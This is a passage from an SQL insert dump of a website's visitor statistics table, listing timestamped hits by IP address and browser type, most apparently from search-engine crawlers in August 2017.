7.182.132.61','other'),(144939,1502578662,1,1,0,0,'51.255.71.120','other'),(144940,1502578904,1,1,0,0,'66.249.66.155','chrome'),(144941,1502578931,1,1,0,0,'91.209.11.236','other'),(144942,1502579129,1,1,0,0,'51.255.65.224','other'),(144943,1502579244,1,1,0,0,'217.182.132.7','other'),(144944,1502580276,1,1,0,0,'217.182.132.173','other'),(144945,1502580296,1,1,0,0,'137.74.207.120','other'),(144946,1502580422,1,1,0,0,'217.182.132.66','other'),(144947,1502580737,1,0,1,0,'66.249.66.157',''),(144948,1502580829,1,1,0,0,'5.45.207.64','other'),(144949,1502581758,1,1,0,0,'5.45.207.64','other'),(144950,1502582280,1,1,0,0,'217.182.132.4','other'),(144951,1502582482,1,0,1,0,'66.249.66.155',''),(144952,1502582501,1,1,0,0,'141.8.183.1','other'),(144953,1502582595,1,1,0,0,'217.69.133.9','other'),(144954,1502582624,1,1,0,0,'176.14.207.97','msie'),(144955,1502582696,1,1,0,0,'95.108.181.60','other'),(144956,1502582817,1,1,0,0,'51.255.71.114','other'),(144957,1502582857,1,1,0,0,'217.182.132.36','other'),(144958,1502582999,1,1,0,0,'51.255.65.13','other'),(144959,1502583036,1,1,0,0,'217.182.132.85','other'),(144960,1502583265,1,1,0,0,'51.255.65.17','other'),(144961,1502584045,1,1,0,0,'51.255.65.21','other'),(144962,1502584534,1,1,0,0,'5.45.207.64','other'),(144963,1502584605,1,1,0,0,'164.132.162.153','other'),(144964,1502584717,1,1,0,0,'217.182.132.35','other'),(144965,1502584941,1,1,0,0,'51.255.65.49','other'),(144966,1502585000,1,1,0,0,'164.132.162.159','other'),(144967,1502585122,3,3,0,0,'216.244.66.194','other'),(144968,1502585251,1,1,0,0,'8.29.198.25','other'),(144969,1502585565,1,1,0,0,'51.255.71.132','other'),(144970,1502586443,1,1,0,0,'51.255.71.112','other'),(144971,1502586761,1,1,0,0,'141.8.142.43','other'),(144972,1502587841,1,1,0,0,'217.182.132.75','other'),(144973,1502588316,1,0,1,0,'68.180.229.59',''),(144974,1502588475,1,1,0,0,'216.244.66.237','other'),(144975,1502589327,1,1,0,0,'5.45.207.64','other'),(144976,1502589860,1,1,0,0,'217.69.133.203','other'),(144977,1502590350,1,0,1,0,'66.249.66.156',''),(144978,1502590420,1,0,1,0,'66.249.66.155',''),(144979,1502591520,1,1,0,0,'51.255.65.7','other'),(144980,1502592140,1,1,0,0,'51.255.65.76','other'),(144981,1502593297,1,1,0,0,'137.74.207.116','other'),(144982,1502593305,1,1,0,0,'91.196.178.163','chrome'),(144983,1502594719,1,1,0,0,'35.184.189.105','other'),(144984,1502594729,1,1,0,0,'91.209.11.236','other'),(144985,1502594750,1,1,0,0,'217.69.133.6','other'),(144986,1502595006,1,1,0,0,'217.182.132.66','other'),(144987,1502595252,4,4,0,0,'216.244.66.194','other'),(144988,1502595709,1,1,0,0,'95.108.181.94','other'),(144989,1502595714,1,1,0,0,'51.255.65.91','other'),(144990,1502595801,1,1,0,0,'5.45.207.64','other'),(144991,1502595834,1,1,0,0,'40.77.167.60','other'),(144992,1502596075,1,1,0,0,'8.29.198.25','other'),(144993,1502596422,2,2,0,0,'91.209.11.236','other'),(144994,1502596491,1,0,1,0,'66.249.66.156',''),(144995,1502597010,1,1,0,0,'137.74.207.120','other'),(144996,1502597178,5,5,0,0,'216.244.66.194','other'),(144997,1502597481,1,1,0,0,'217.182.132.71','other'),(144998,1502597540,1,1,0,0,'95.108.181.57','other'),(144999,1502597692,1,0,1,0,'66.249.66.76',''),(145000,1502597753,1,1,0,0,'157.55.39.205','other'),(145001,1502597771,1,1,0,0,'37.9.113.78','other'),(145002,1502597937,1,1,0,0,'91.209.11.236','other'),(145003,1502598024,1,1,0,0,'157.55.39.164','other'),(145004,1502598443,1,1,0,0,'5.45.207.64','other'),(145005,1502598768,1,1,0,0,'51.255.65.62','other'),(145006,1502599150,1,1,0,0,'137.74.201.99','other'),(145007,1502599434,1,1,0,0,'95.108.181.57','other'),(145008,1502599784,1,1,0,0,'5.255.253.1','other'),(145009,1502600252,2,2,0,0,'91.209.11.236','other'),(145010,1502601689,1,1,0,0,'37.9.113.78','other'),(145011,1502602422,8,8,0,0,'78.46.104.69','other'),(145012,1502602507,1,1,0,0,'137.74.207.120','other'),(145013,1502602519,1,1,0,0,'217.182.132.4','other'),(145014,1502603142,1,0,1,0,'66.249.66.156',''),(145015,1502603295,2,2,0,0,'46.211.125.183','chrome'),(145016,1502603396,1,1,0,0,'51.255.65.20','other'),(145017,1502603929,1,1,0,0,'217.182.132.151','other'),(145018,1502604058,1,1,0,0,'51.255.65.19','other'),(145019,1502604095,1,1,0,0,'91.209.11.236','other'),(145020,1502604411,1,1,0,0,'5.255.253.4','other'),(145021,1502604450,1,1,0,0,'217.182.132.76','other'),(145022,1502605283,1,1,0,0,'51.255.65.58','other'),(145023,1502605385,1,1,0,0,'35.184.189.105','other'),(145024,1502605684,1,1,0,0,'217.182.132.96','other'),(145025,1502606298,1,1,0,0,'37.9.113.78','other'),(145026,1502606393,1,0,1,0,'68.180.229.59',''),(145027,1502606434,1,1,0,0,'51.255.65.33','other'),(145028,1502606471,1,1,0,0,'5.45.207.56','other'),(145029,1502606525,1,1,0,0,'157.55.39.205','other'),(145030,1502606682,6,6,0,0,'216.244.66.194','other'),(145031,1502606850,1,1,0,0,'217.182.132.80','other'),(145032,1502606903,1,1,0,0,'8.29.198.26','other'),(145033,1502607175,1,1,0,0,'91.209.11.236','other'),(145034,1502607226,1,1,0,0,'51.255.71.101','other'),(145035,1502607492,1,1,0,0,'51.255.65.30','other'),(145036,1502607533,1,1,0,0,'51.255.65.56','other'),(145037,1502607548,1,1,0,0,'178.95.245.180','other'),(145038,1502607654,1,1,0,0,'51.255.65.78','other'),(145039,1502607883,1,1,0,0,'217.182.132.18','other'),(145040,1502607975,4,4,0,0,'216.244.66.194','other'),(145041,1502608445,3,3,0,0,'91.209.11.236','other'),(145042,1502608640,1,1,0,0,'51.255.65.82','other'),(145043,1502608713,1,1,0,0,'51.255.65.92','other'),(145044,1502609088,1,1,0,0,'217.182.132.188','other'),(145045,1502609524,1,1,0,0,'91.209.11.236','other'),(145046,1502610091,1,0,1,0,'66.249.66.156',''),(145047,1502610414,1,0,1,0,'66.249.66.75',''),(145048,1502610677,1,1,0,0,'5.45.207.56','other'),(145049,1502610989,1,1,0,0,'180.76.15.147','other'),(145050,1502611242,1,1,0,0,'217.69.133.6','other'),(145051,1502611453,1,1,0,0,'51.255.65.33','other'),(145052,1502611748,1,1,0,0,'217.182.132.71','other'),(145053,1502611802,1,1,0,0,'91.196.178.161','chrome'),(145054,1502612085,1,1,0,0,'216.244.66.194','other'),(145055,1502612214,1,0,1,0,'66.249.66.76',''),(145056,1502612365,1,1,0,0,'217.182.132.69','other'),(145057,1502612379,1,1,0,0,'217.182.132.85','other'),(145058,1502613175,1,1,0,0,'217.182.132.94','other'),(145059,1502613383,1,1,0,0,'120.60.131.234','firefox'),(145060,1502613455,1,1,0,0,'164.132.162.156','other'),(145061,1502613546,1,1,0,0,'51.255.65.84','other'),(145062,1502614031,1,1,0,0,'141.8.142.25','other'),(145063,1502614356,1,1,0,0,'51.255.65.48','other'),(145064,1502614932,1,1,0,0,'173.208.157.186','other'),(145065,1502615349,1,1,0,0,'217.182.132.91','other'),(145066,1502615362,2,2,0,0,'157.55.39.164','other'),(145067,1502616250,1,1,0,0,'5.45.207.57','other'),(145068,1502616444,2,2,0,0,'216.244.66.194','other'),(145069,1502616587,1,1,0,0,'216.244.66.237','other'),(145070,1502616751,1,1,0,0,'95.132.9.90','firefox'),(145071,1502617632,1,0,1,0,'66.249.66.156',''),(145072,1502617741,1,1,0,0,'8.29.198.27','other'),(145073,1502617859,1,1,0,0,'217.182.132.53','other'),(145074,1502618076,5,5,0,0,'216.244.66.194','other'),(145075,1502618634,1,0,1,0,'66.249.66.157',''),(145076,1502619196,1,1,0,0,'141.8.183.21','other'),(145077,1502619673,1,1,0,0,'216.244.66.237','other'),(145078,1502620131,1,1,0,0,'217.182.132.33','other'),(145079,1502620834,2,1,1,0,'66.249.66.156',''),(145080,1502621070,1,1,0,0,'217.69.133.6','other'),(145081,1502621700,1,1,0,0,'5.255.253.14','other'),(145082,1502621702,1,1,0,0,'54.166.236.238','other'),(145083,1502621716,1,1,0,0,'217.182.132.29','other'),(145084,1502621932,1,1,0,0,'95.108.181.69','other'),(145085,1502622015,1,1,0,0,'40.77.167.60','other'),(145086,1502622181,1,1,0,0,'217.69.133.194','other'),(145087,1502622531,1,1,0,0,'141.8.142.21','other'),(145088,1502622910,1,1,0,0,'157.55.39.174','other'),(145089,1502622983,1,1,0,0,'217.69.133.2','other'),(145090,1502623161,1,1,0,0,'95.108.181.69','other'),(145091,1502625463,5,5,0,0,'216.244.66.194','other'),(145092,1502625776,1,1,0,0,'217.182.132.97','other'),(145093,1502626053,1,1,0,0,'51.255.65.5','other'),(145094,1502626075,1,0,1,0,'66.249.66.75',''),(145095,1502626392,5,5,0,0,'216.244.66.194','other'),(145096,1502626568,1,1,0,0,'217.69.133.9','other'),(145097,1502627157,1,1,0,0,'141.8.142.21','other'),(145098,1502627274,1,1,0,0,'141.8.142.107','other'),(145099,1502627323,1,1,0,0,'51.255.65.12','other'),(145100,1502627363,1,1,0,0,'91.196.178.39','chrome'),(145101,1502627672,1,1,0,0,'51.255.65.37','other'),(145102,1502628032,1,1,0,0,'217.182.132.80','other'),(145103,1502628081,1,1,0,0,'51.255.65.10','other'),(145104,1502628140,1,1,0,0,'51.255.65.90','other'),(145105,1502628325,1,1,0,0,'51.255.71.115','other'),(145106,1502628370,1,1,0,0,'141.8.183.1','other'),(145107,1502628564,1,1,0,0,'8.29.198.25','other'),(145108,1502629007,1,1,0,0,'217.182.132.23','other'),(145109,1502629318,1,1,0,0,'94.179.209.181','chrome'),(145110,1502629394,1,1,0,0,'95.108.181.58','other'),(145111,1502629630,1,1,0,0,'180.76.15.137','other'),(145112,1502630032,1,1,0,0,'217.182.132.190','other'),(145113,1502630442,1,1,0,0,'66.102.9.25','chrome'),(145114,1502630484,1,1,0,0,'141.8.183.1','other'),(145115,1502630654,1,1,0,0,'78.111.189.94','other'),(145116,1502631395,1,0,1,0,'66.249.66.74',''),(145117,1502631897,1,1,0,0,'176.31.231.10','other'),(145118,1502631931,1,1,0,0,'157.55.39.174','other'),(145119,1502633284,1,0,1,0,'66.249.66.157',''),(145120,1502633546,1,1,0,0,'141.8.142.83','other'),(145121,1502634027,1,1,0,0,'217.182.132.75','other'),(145122,1502634157,1,1,0,0,'91.196.178.165','chrome'),(145123,1502634328,1,1,0,0,'217.182.132.64','other'),(145124,1502634583,4,4,0,0,'216.244.66.194','other'),(145125,1502636052,1,1,0,0,'137.74.207.159','other'),(145126,1502636363,1,1,0,0,'51.255.65.88','other'),(145127,1502636421,1,1,0,0,'91.209.11.236','other'),(145128,1502636486,1,1,0,0,'217.182.132.181','other'),(145129,1502636834,4,4,0,0,'216.244.66.194','other'),(145130,1502636857,1,1,0,0,'213.180.203.32','other'),(145131,1502637006,1,1,0,0,'66.249.66.75','chrome'),(145132,1502637455,2,2,0,0,'141.8.183.1','other'),(145133,1502637587,1,1,0,0,'217.182.132.25','other'),(145134,1502637596,1,1,0,0,'217.69.133.6','other'),(145135,1502638721,1,1,0,0,'180.76.15.29','other'),(145136,1502638831,1,1,0,0,'141.8.183.5','other'),(145137,1502639313,1,1,0,0,'51.255.65.52','other'),(145138,1502639395,1,1,0,0,'8.29.198.26','other'),(145139,1502639653,1,1,0,0,'141.8.142.21','other'),(145140,1502639919,1,0,1,0,'66.249.66.75',''),(145141,1502639945,1,1,0,0,'91.209.11.236','other'),(145142,1502640255,1,1,0,0,'5.45.207.64','other'),(145143,1502641117,1,1,0,0,'217.182.132.33','other'),(145144,1502641131,1,1,0,0,'51.255.71.123','other'),(145145,1502641564,1,1,0,0,'51.255.65.6','other'),(145146,1502641781,1,1,0,0,'40.77.167.60','other'),(145147,1502642427,1,1,0,0,'217.182.132.4','other'),(145148,1502642570,1,1,0,0,'216.244.66.194','other'),(145149,1502642697,1,1,0,0,'141.8.142.21','other'),(145150,1502642846,1,0,1,0,'66.249.66.76',''),(145151,1502643283,1,1,0,0,'217.182.132.71','other'),(145152,1502643389,1,1,0,0,'51.255.65.70','other'),(145153,1502643654,1,1,0,0,'216.244.66.194','other'),(145154,1502643666,1,1,0,0,'217.182.132.52','other'),(145155,1502643846,1,1,0,0,'95.134.97.16','firefox'),(145156,1502643930,1,1,0,0,'141.8.142.107','other'),(145157,1502643991,2,2,0,0,'91.209.11.236','other'),(145158,1502644570,1,1,0,0,'217.182.132.91','other'),(145159,1502644577,2,2,0,0,'216.244.66.194','other'),(145160,1502644599,1,0,1,0,'66.249.66.157',''),(145161,1502644830,1,1,0,0,'141.8.142.17','other'),(145162,1502645043,1,1,0,0,'157.55.39.174','other'),(145163,1502645530,1,1,0,0,'178.154.200.7','other'),(145164,1502646156,1,0,1,0,'66.249.66.76',''),(145165,1502646212,9,9,0,0,'216.244.66.194','other'),(145166,1502646907,1,1,0,0,'5.255.253.29','other'),(145167,1502647040,1,1,0,0,'91.196.178.132','firefox'),(145168,1502647564,1,1,0,0,'217.182.132.88','other'),(145169,1502647752,1,1,0,0,'5.45.207.64','other'),(145170,1502647921,1,1,0,0,'51.255.71.112','other'),(145171,1502648116,1,1,0,0,'91.196.178.132','firefox'),(145172,1502648133,1,1,0,0,'217.182.132.21','other'),(145173,1502648254,1,1,0,0,'157.55.39.174','other'),(145174,1502648326,1,1,0,0,'217.182.132.57','other'),(145175,1502648340,1,1,0,0,'91.196.178.69','chrome'),(145176,1502648562,1,1,0,0,'51.255.65.33','other'),(145177,1502648956,1,1,0,0,'51.255.65.16','other'),(145178,1502649208,1,1,0,0,'141.8.183.1','other'),(145179,1502649523,1,1,0,0,'89.169.89.98','chrome'),(145180,1502649533,1,1,0,0,'217.182.132.29','other'),(145181,1502649632,1,1,0,0,'51.255.65.52','other'),(145182,1502649752,1,0,1,0,'66.249.66.155',''),(145183,1502649772,1,1,0,0,'141.8.142.107','other'),(145184,1502649995,1,1,0,0,'91.196.178.132','firefox'),(145185,1502650157,1,1,0,0,'91.209.11.236','other'),(145186,1502650228,1,1,0,0,'8.29.198.27','other'),(145187,1502650455,1,1,0,0,'217.69.133.5','other'),(145188,1502650745,1,1,0,0,'178.154.200.7','other'),(145189,1502651798,1,1,0,0,'51.255.65.39','other'),(145190,1502652477,1,1,0,0,'141.8.142.21','other'),(145191,1502653278,1,0,1,0,'66.249.66.75',''),(145192,1502653344,1,1,0,0,'51.255.65.4','other'),(145193,1502653703,1,1,0,0,'94.228.207.215','chrome'),(145194,1502654363,1,1,0,0,'141.8.183.1','other'),(145195,1502654628,1,0,1,0,'66.249.66.155',''),(145196,1502654821,1,1,0,0,'51.255.65.50','other'),(145197,1502655230,2,2,0,0,'5.45.207.64','other'),(145198,1502655280,1,1,0,0,'51.255.65.92','other'),(145199,1502655321,3,3,0,0,'216.244.66.194','other'),(145200,1502655925,1,1,0,0,'217.69.133.2','other'),(145201,1502656160,1,1,0,0,'95.108.181.69','other'),(145202,1502656477,1,1,0,0,'213.180.203.32','other'),(145203,1502656849,1,1,0,0,'217.182.132.66','other'),(145204,1502656923,1,1,0,0,'164.132.162.160','other'),(145205,1502657027,1,1,0,0,'51.255.65.88','other'),(145206,1502657452,1,0,1,0,'66.249.66.75',''),(145207,1502657661,1,1,0,0,'217.182.132.146','other'),(145208,1502658013,2,2,0,0,'91.209.11.236','other'),(145209,1502658282,2,2,0,0,'216.244.66.194','other'),(145210,1502658613,1,1,0,0,'141.8.183.2','other'),(145211,1502658747,1,0,1,0,'68.180.229.59',''),(145212,1502659217,1,1,0,0,'141.8.183.1','other'),(145213,1502659709,1,1,0,0,'95.108.181.52','other'),(145214,1502660071,1,1,0,0,'217.182.132.181','other'),(145215,1502660072,1,1,0,0,'141.8.142.21','other'),(145216,1502660209,2,2,0,0,'141.8.142.107','other'),(145217,1502660364,1,1,0,0,'91.209.11.236','other'),(145218,1502660511,1,1,0,0,'94.228.207.215','firefox'),(145219,1502660789,1,0,1,0,'68.180.229.59',''),(145220,1502660937,1,1,0,0,'51.255.65.16','other'),(145221,1502661058,1,1,0,0,'8.29.198.25','other'),(145222,1502661311,1,1,0,0,'51.255.65.49','other'),(145223,1502661435,1,1,0,0,'217.69.133.2','other'),(145224,1502661624,1,1,0,0,'51.255.65.22','other'),(145225,1502661774,1,1,0,0,'141.8.183.1','other'),(145226,1502661941,1,1,0,0,'217.182.132.28','other'),(145227,1502661962,1,1,0,0,'51.255.71.121','other'),(145228,1502661987,1,1,0,0,'66.249.66.155','chrome'),(145229,1502662135,1,1,0,0,'157.55.39.205','other'),(145230,1502662506,1,1,0,0,'51.255.65.20','other'),(145231,1502663099,2,2,0,0,'141.8.183.1','other'),(145232,1502663171,1,1,0,0,'217.182.132.186','other'),(145233,1502663200,1,1,0,0,'217.182.132.87','other'),(145234,1502663390,1,1,0,0,'141.8.142.21','other'),(145235,1502663777,1,1,0,0,'51.255.65.12','other'),(145236,1502664659,1,1,0,0,'141.8.142.107','other'),(145237,1502664964,1,0,1,0,'68.180.229.59',''),(145238,1502665132,1,1,0,0,'217.182.132.15','other'),(145239,1502665840,1,1,0,0,'217.182.132.79','other'),(145240,1502666073,1,1,0,0,'151.80.27.118','other'),(145241,1502666293,7,7,0,0,'216.244.66.194','other'),(145242,1502666319,1,1,0,0,'157.55.39.174','other'),(145243,1502666497,1,1,0,0,'141.8.142.107','other'),(145244,1502666679,1,1,0,0,'217.182.132.175','other'),(145245,1502666916,1,1,0,0,'217.69.133.3','other'),(145246,1502667006,1,1,0,0,'217.182.132.79','other'),(145247,1502667191,1,1,0,0,'51.255.65.49','other'),(145248,1502667284,1,1,0,0,'51.255.65.54','other'),(145249,1502667862,1,1,0,0,'51.255.71.101','other'),(145250,1502667908,1,0,1,0,'66.249.66.75',''),(145251,1502667957,1,0,1,0,'66.249.66.157',''),(145252,1502668018,1,1,0,0,'217.182.132.157','other'),(145253,1502668287,1,1,0,0,'51.255.71.122','other'),(145254,1502668778,1,1,0,0,'5.45.207.64','other'),(145255,1502669317,1,1,0,0,'51.255.65.76','other'),(145256,1502669505,1,1,0,0,'66.249.66.156','chrome'),(145257,1502670044,1,1,0,0,'180.76.15.24','other'),(145258,1502670924,1,1,0,0,'141.8.142.107','other'),(145259,1502671581,1,1,0,0,'217.182.132.186','other'),(145260,1502671680,1,1,0,0,'51.255.65.60','other'),(145261,1502671889,1,1,0,0,'8.29.198.26','other'),(145262,1502672561,1,1,0,0,'51.255.65.96','other'),(145263,1502672757,1,1,0,0,'157.55.39.81','other'),(145264,1502672830,1,0,1,0,'66.249.66.156',''),(145265,1502673394,1,1,0,0,'217.182.132.67','other'),(145266,1502673691,1,1,0,0,'91.209.11.236','other'),(145267,1502675031,1,1,0,0,'51.255.65.95','other'),(145268,1502675254,1,1,0,0,'164.132.162.187','other'),(145269,1502675282,1,1,0,0,'5.45.207.64','other'),(145270,1502675445,1,1,0,0,'51.255.65.7','other'),(145271,1502675450,1,1,0,0,'141.8.183.1','other'),(145272,1502675534,1,1,0,0,'91.209.11.236','other'),(145273,1502675846,1,1,0,0,'217.182.132.171','other'),(145274,1502676043,1,1,0,0,'51.255.65.92','other'),(145275,1502676470,1,1,0,0,'51.255.65.73','other'),(145276,1502676653,1,1,0,0,'217.182.132.185','other'),(145277,1502676848,4,4,0,0,'216.244.66.194','other'),(145278,1502677435,1,1,0,0,'141.8.183.1','other'),(145279,1502678243,1,1,0,0,'217.182.132.188','other'),(145280,1502678378,1,1,0,0,'5.255.253.4','other'),(145281,1502678705,1,1,0,0,'51.255.65.66','other'),(145282,1502678959,1,1,0,0,'51.255.65.6','other'),(145283,1502679410,1,0,1,0,'66.249.66.74',''),(145284,1502679458,1,0,1,0,'66.249.66.157',''),(145285,1502679645,1,1,0,0,'217.182.132.21','other'),(145286,1502679720,1,1,0,0,'51.255.65.60','other'),(145287,1502680050,1,1,0,0,'81.1.242.33','other'),(145288,1502680405,1,1,0,0,'137.74.207.170','other'),(145289,1502680860,1,1,0,0,'217.182.132.193','other'),(145290,1502680931,1,1,0,0,'217.182.132.86','other'),(145291,1502681058,1,1,0,0,'51.255.71.133','other'),(145292,1502681394,3,3,0,0,'81.1.242.33','other'),(145293,1502681773,1,1,0,0,'107.167.106.88','other'),(145294,1502682714,1,1,0,0,'8.29.198.25','other'),(145295,1502682789,1,1,0,0,'157.55.39.205','other'),(145296,1502682809,1,0,1,0,'68.180.229.59',''),(145297,1502683369,1,1,0,0,'91.209.11.236','other'),(145298,1502683838,1,1,0,0,'40.77.167.60','other'),(145299,1502683895,1,1,0,0,'217.182.132.4','other'),(145300,1502685211,1,1,0,0,'217.182.132.14','other'),(145301,1502685213,1,1,0,0,'51.255.65.11','other'),(145302,1502685290,1,0,1,0,'66.249.66.74',''),(145303,1502685364,1,1,0,0,'217.182.132.153','other'),(145304,1502685464,1,1,0,0,'141.8.183.2','other'),(145305,1502685558,1,0,1,0,'66.249.66.156',''),(145306,1502686089,1,1,0,0,'91.196.178.68','firefox'),(145307,1502686998,1,1,0,0,'51.255.65.55','other'),(145308,1502687115,1,1,0,0,'141.8.142.43','other'),(145309,1502687176,2,2,0,0,'216.244.66.194','other'),(145310,1502687420,1,1,0,0,'51.255.65.85','other'),(145311,1502687570,2,2,0,0,'144.76.12.99','other'),(145312,1502687572,1,1,0,0,'141.8.183.5','other'),(145313,1502687578,2,2,0,0,'5.9.149.98','other'),(145314,1502687754,1,1,0,0,'157.55.39.174','other'),(145315,1502687764,2,2,0,0,'95.213.141.126','opera'),(145316,1502688175,1,1,0,0,'216.244.66.237','other'),(145317,1502688527,1,1,0,0,'51.255.65.82','other'),(145318,1502688626,1,1,0,0,'51.255.65.45','other'),(145319,1502688873,1,1,0,0,'91.196.178.68','firefox'),(145320,1502688912,1,0,1,0,'66.249.66.156',''),(145321,1502688915,1,1,0,0,'213.180.203.32','other'),(145322,1502689775,1,1,0,0,'51.255.65.35','other'),(145323,1502690045,1,1,0,0,'157.55.39.205','other'),(145324,1502690131,1,1,0,0,'91.196.178.71','chrome'),(145325,1502690292,1,1,0,0,'141.8.183.1','other'),(145326,1502690561,1,1,0,0,'217.182.132.87','other'),(145327,1502690838,1,1,0,0,'51.255.65.35','other'),(145328,1502690873,1,1,0,0,'37.9.113.163','other'),(145329,1502692231,1,1,0,0,'91.196.178.66','firefox'),(145330,1502692242,1,1,0,0,'164.132.162.154','other'),(145331,1502692433,1,1,0,0,'141.8.142.107','other'),(145332,1502693140,1,1,0,0,'137.74.207.108','other'),(145333,1502693540,1,1,0,0,'8.29.198.26','other'),(145334,1502693587,2,2,0,0,'141.8.183.1','other'),(145335,1502693907,1,1,0,0,'217.182.132.69','other'),(145336,1502694109,1,1,0,0,'217.182.132.19','other'),(145337,1502694315,1,1,0,0,'51.255.65.55','other'),(145338,1502694357,1,1,0,0,'217.69.133.4','other'),(145339,1502694583,1,0,1,0,'66.249.66.157',''),(145340,1502695168,1,1,0,0,'35.184.189.105','other'),(145341,1502695192,1,0,1,0,'66.249.66.156',''),(145342,1502695199,1,1,0,0,'37.54.16.139','chrome'),(145343,1502695505,1,1,0,0,'178.255.215.94','other'),(145344,1502695679,2,2,0,0,'91.209.11.236','other'),(145345,1502696314,9,9,0,0,'216.244.66.194','other'),(145346,1502696320,1,1,0,0,'51.255.65.70','other'),(145347,1502696418,1,1,0,0,'141.8.142.107','other'),(145348,1502697003,1,1,0,0,'217.182.132.54','other'),(145349,1502697117,2,2,0,0,'178.154.200.7','other'),(145350,1502697126,2,2,0,0,'141.8.183.1','other'),(145351,1502697347,1,1,0,0,'91.209.11.236','other'),(145352,1502697627,1,1,0,0,'217.182.132.171','other'),(145353,1502697921,1,1,0,0,'217.69.133.9','other'),(145354,1502697937,1,0,1,0,'66.249.66.157',''),(145355,1502697975,1,1,0,0,'94.179.179.55','chrome'),(145356,1502698020,1,1,0,0,'157.55.39.174','other'),(145357,1502698101,2,2,0,0,'91.196.178.67','chrome'),(145358,1502698291,1,1,0,0,'51.255.65.6','other'),(145359,1502698336,1,0,1,0,'66.249.66.76',''),(145360,1502698376,2,2,0,0,'46.201.175.91','chrome'),(145361,1502698545,1,1,0,0,'141.8.183.1','other'),(145362,1502698566,1,1,0,0,'82.145.221.194','chrome'),(145363,1502698736,1,1,0,0,'217.182.132.188','other'),(145364,1502698751,1,1,0,0,'51.255.65.67','other'),(145365,1502699237,1,1,0,0,'178.154.200.7','other'),(145366,1502699594,1,1,0,0,'91.196.178.162','chrome'),(145367,1502699797,1,1,0,0,'51.255.65.32','other'),(145368,1502699818,1,1,0,0,'217.69.133.5','other'),(145369,1502699849,1,1,0,0,'91.209.11.236','other'),(145370,1502700585,1,1,0,0,'194.79.11.98','firefox'),(145371,1502701018,1,1,0,0,'91.196.178.135','firefox'),(145372,1502701143,1,0,1,0,'68.180.228.164',''),(145373,1502701344,1,1,0,0,'91.196.178.103','chrome'),(145374,1502701563,1,1,0,0,'157.55.39.174','other'),(145375,1502701931,1,1,0,0,'217.182.132.23','other'),(145376,1502702489,1,1,0,0,'91.196.178.70','firefox'),(145377,1502702636,1,1,0,0,'81.1.242.33','other'),(145378,1502702796,1,1,0,0,'217.182.132.32','other'),(145379,1502702816,1,1,0,0,'51.255.65.10','other'),(145380,1502703285,1,1,0,0,'91.209.11.236','other'),(145381,1502703862,1,1,0,0,'51.255.71.122','other'),(145382,1502703927,1,0,1,0,'66.249.66.157',''),(145383,1502703962,2,2,0,0,'81.1.242.33','other'),(145385,1502704006,1,1,0,0,'46.201.175.91','firefox'),(145386,1502704367,1,1,0,0,'8.29.198.27','other'),(145387,1502705321,1,1,0,0,'217.69.133.6','other'),(145388,1502705800,1,1,0,0,'83.10.222.83','chrome'),(145389,1502705838,1,1,0,0,'51.255.71.132','other'),(145390,1502705984,1,1,0,0,'216.244.66.194','other'),(145391,1502706510,1,1,0,0,'51.255.65.37','other'),(145392,1502706959,7,7,0,0,'216.244.66.194','other'),(145393,1502707048,1,1,0,0,'91.209.11.236','other'),(145394,1502707599,1,0,1,0,'66.249.66.155',''),(145395,1502707935,1,1,0,0,'5.45.207.64','other'),(145396,1502708638,1,1,0,0,'217.182.132.66','other'),(145397,1502708930,1,1,0,0,'217.182.132.184','other'),(145398,1502708949,1,1,0,0,'217.69.133.2','other'),(145399,1502709138,1,1,0,0,'217.182.132.14','other'),(145400,1502709242,1,1,0,0,'217.182.132.33','other'),(145401,1502709255,1,1,0,0,'40.77.167.9','other'),(145402,1502709412,1,0,1,0,'66.249.66.74',''),(145403,1502709478,1,1,0,0,'91.209.11.236','other'),(145404,1502709893,1,1,0,0,'91.196.178.68','chrome'),(145405,1502709977,1,1,0,0,'194.60.77.217','chrome'),(145406,1502710289,1,1,0,0,'141.8.142.21','other'),(145407,1502710422,1,1,0,0,'37.53.88.232','firefox'),(145408,1502710484,1,1,0,0,'66.102.9.29','chrome'),(145409,1502710642,1,1,0,0,'185.26.218.144','msie'),(145410,1502710681,1,1,0,0,'91.196.178.66','firefox'),(145411,1502710940,1,0,1,0,'66.249.66.157',''),(145412,1502711686,1,1,0,0,'31.43.31.47','chrome'),(145413,1502711844,1,1,0,0,'141.8.183.5','other'),(145414,1502711848,1,1,0,0,'5.255.253.4','other'),(145415,1502712012,1,0,1,0,'66.249.66.74',''),(145416,1502712055,1,1,0,0,'5.45.207.64','other'),(145417,1502712345,1,1,0,0,'217.182.132.151','other'),(145418,1502712413,1,1,0,0,'46.164.130.92','chrome'),(145419,1502713041,1,1,0,0,'91.196.178.67','chrome'),(145420,1502713174,1,1,0,0,'137.74.207.114','other'),(145421,1502713218,1,1,0,0,'185.182.81.9','chrome'),(145422,1502713432,1,1,0,0,'164.132.162.188','other'),(145423,1502713689,1,1,0,0,'141.8.183.1','other'),(145424,1502713910,1,1,0,0,'91.196.178.68','firefox'),(145425,1502714107,1,1,0,0,'51.255.71.110','other'),(145426,1502714741,1,1,0,0,'141.8.142.21','other'),(145427,1502715033,1,1,0,0,'217.182.132.54','other'),(145428,1502715198,1,1,0,0,'8.29.198.27','other'),(145429,1502715224,1,1,0,0,'5.45.207.64','other'),(145430,1502715607,1,1,0,0,'107.167.109.167','other'),(145431,1502715695,1,1,0,0,'213.180.203.32','other'),(145432,1502715891,1,1,0,0,'91.196.178.72','firefox'),(145433,1502716171,1,1,0,0,'137.74.201.99','other'),(145434,1502716626,6,6,0,0,'216.244.66.194','other'),(145435,1502716628,1,1,0,0,'141.8.142.107','other'),(145436,1502717071,1,1,0,0,'91.196.178.72','firefox'),(145437,1502717212,1,1,0,0,'51.255.65.35','other'),(145438,1502717508,1,1,0,0,'213.180.203.32','other'),(145439,1502717657,1,1,0,0,'141.8.183.1','other'),(145440,1502717740,1,1,0,0,'46.201.35.14','chrome'),(145441,1502717783,1,1,0,0,'180.76.15.154','other'),(145442,1502717789,1,1,0,0,'37.54.21.237','chrome'),(145443,1502718239,1,1,0,0,'91.196.177.46','firefox'),(145444,1502718514,1,0,1,0,'68.180.229.59',''),(145445,1502718523,1,1,0,0,'185.137.18.46','chrome'),(145446,1502719281,1,1,0,0,'51.255.65.89','other'),(145447,1502719408,3,3,0,0,'216.244.66.194','other'),(145448,1502719896,1,1,0,0,'217.69.133.9','other'),(145449,1502720019,1,1,0,0,'180.76.15.162','other'),(145450,1502720259,1,1,0,0,'91.209.11.236','other'),(145451,1502720261,1,1,0,0,'51.255.65.2','other'),(145452,1502720540,1,1,0,0,'178.154.200.7','other'),(145453,1502720710,1,1,0,0,'213.180.203.32','other'),(145454,1502720796,1,1,0,0,'217.182.13